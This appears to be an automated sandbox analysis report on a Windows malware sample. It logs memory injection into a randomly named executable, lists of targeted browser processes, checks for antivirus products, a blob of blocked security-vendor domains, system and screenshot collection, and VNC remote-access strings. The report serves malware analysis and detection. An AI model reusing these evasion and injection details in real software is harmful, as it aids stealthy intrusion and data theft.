    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: C30000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: C31000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: C32000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: C85000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1470000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1471000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1472000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 14C5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: DF0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: DF1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: DF2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: E45000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: E10000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: E11000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: E12000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: E65000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 11C0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 11C1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 11C2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1215000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 650000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 651000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 652000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 6A5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_02BC78A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_008E78A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_008978A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex9_2_02BE78A0
    Source: C:\Users\user\Desktop\arxtPs1STE.exeFile opened: CA HIPS KmxAgentJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeFile opened: Agnitum Outpost firewal \pipe\acsipc_serverJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeFile opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csiJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeFile opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.datJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeWindow found: AVP NULL ____AVP.RootJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened: CA HIPS KmxAgentJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened: Agnitum Outpost firewal \pipe\acsipc_serverJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csiJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.datJump to behavior
    Source: C:\Windows\apppatch\svchost.exeWindow found: AVP NULL ____AVP.RootJump to behavior
    Source: arxtPs1STE.exe, arxtPs1STE.exe, 00000000.00000003.1390809231.000000000077B000.00000004.00000020.00020000.00000000.sdmp, arxtPs1STE.exe, 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1857902418.0000000002C70000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
    Source: tGYLgZxMWmmBTD.exe, 00000005.00000000.1750567152.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, tGYLgZxMWmmBTD.exe, 00000006.00000000.1753855080.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, tGYLgZxMWmmBTD.exe, 00000009.00000000.1760466411.0000000001370000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
    Source: tGYLgZxMWmmBTD.exe, 00000005.00000000.1750567152.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, tGYLgZxMWmmBTD.exe, 00000006.00000000.1753855080.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, tGYLgZxMWmmBTD.exe, 00000009.00000000.1760466411.0000000001370000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
    Source: arxtPs1STE.exe, 00000000.00000003.1390809231.000000000077B000.00000004.00000020.00020000.00000000.sdmp, arxtPs1STE.exe, 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, svchost.exe, 00000002.00000003.1857902418.0000000002C70000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comavast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comgoogle.comgoogle.comDnsapi.dllDnsQuery_ADnsQuery_UTF8DnsQuery_WQuery_Mainws2_32.dllgetaddrinfogethostbynameinet_addrqwrtpsdfghjklzxcvbnmeyuioa1676d5775e05c50b46baa5579d4fc7;%s%sMozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)/login.php6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9100016d3ad29879a90b4dd1b4f76e82166ca3T2data.txt\*.*...\ntdll.dllZwQuerySystemInformationGlobal\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}fuckGlobal\HighMemoryEvent_%08xexplorer.exeShell_TrayWnd
    Source: tGYLgZxMWmmBTD.exe, 00000005.00000000.1750567152.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, tGYLgZxMWmmBTD.exe, 00000006.00000000.1753855080.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, tGYLgZxMWmmBTD.exe, 00000009.00000000.1760466411.0000000001370000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_00414050 cpuid 0_2_00414050
    Source: C:\Windows\apppatch\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\617d763a\debug_28;Nov;2024_17;56;23.log VolumeInformationJump to behavior
    Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\617d763a\scr.bmp VolumeInformationJump to behavior
    Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\617d763a\sysinfo.log VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_00402360 CreateFileA,WriteFile,WriteFile,GetSystemTimeAsFileTime,WriteFile,CloseHandle,0_2_00402360
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_00403A20 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403A20
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB4B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,IsUserAnAdmin,IsUserAnAdmin,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle,2_2_02BB4B00
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_004034C0 GetVersionExA,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,0_2_004034C0
    Source: arxtPs1STE.exeBinary or memory string: S:(ML;;NRNWNX;;;LW)

    Remote Access Functionality

    barindex
    Contains VNC / remote desktop functionality (version string found)
    Source: arxtPs1STE.exeString found in binary or memory: RFB 003.006
    Source: arxtPs1STE.exe, 00000000.00000003.1390809231.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: arxtPs1STE.exe, 00000000.00000003.1390809231.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: arxtPs1STE.exe, 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: RFB 003.006
    Source: arxtPs1STE.exe, 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: $BRFB 003.006
    Source: svchost.exeString found in binary or memory: RFB 003.006
    Source: svchost.exeString found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000002.00000003.1857902418.0000000002C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000002.00000003.1857902418.0000000002C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: svchost.exe, 00000002.00000003.1403293254.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000002.00000003.1403293254.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: svchost.exe, 00000002.00000002.2654834253.0000000002A56000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000002.00000002.2654834253.0000000002A56000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: svchost.exe, 00000002.00000003.1919368621.0000000002C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000002.00000003.1919368621.0000000002C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: svchost.exe, 00000002.00000002.2655337628.0000000002C13000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000002.00000002.2655337628.0000000002C13000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: svchost.exe, 00000002.00000002.2654834253.0000000002A00000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000002.00000002.2654834253.0000000002A00000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: svchost.exe, 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: $BRFB 003.006
    Source: svchost.exe, 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exeString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exeString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000005.00000002.1829128656.00000000008D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000005.00000002.1829128656.00000000008D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000005.00000002.1828939687.0000000000870000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000005.00000002.1828939687.0000000000870000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exeString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exeString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000006.00000002.1844458477.0000000000820000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000006.00000002.1844458477.0000000000820000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000006.00000002.1844914899.0000000000880000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000006.00000002.1844914899.0000000000880000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: tGYLgZxMWmmBTD.exeString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exeString found in binary or memory: RFB 003.006
    Source: tGYLgZxMWmmBTD.exe, 00000009.00000002.1857835167.00000000027C0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
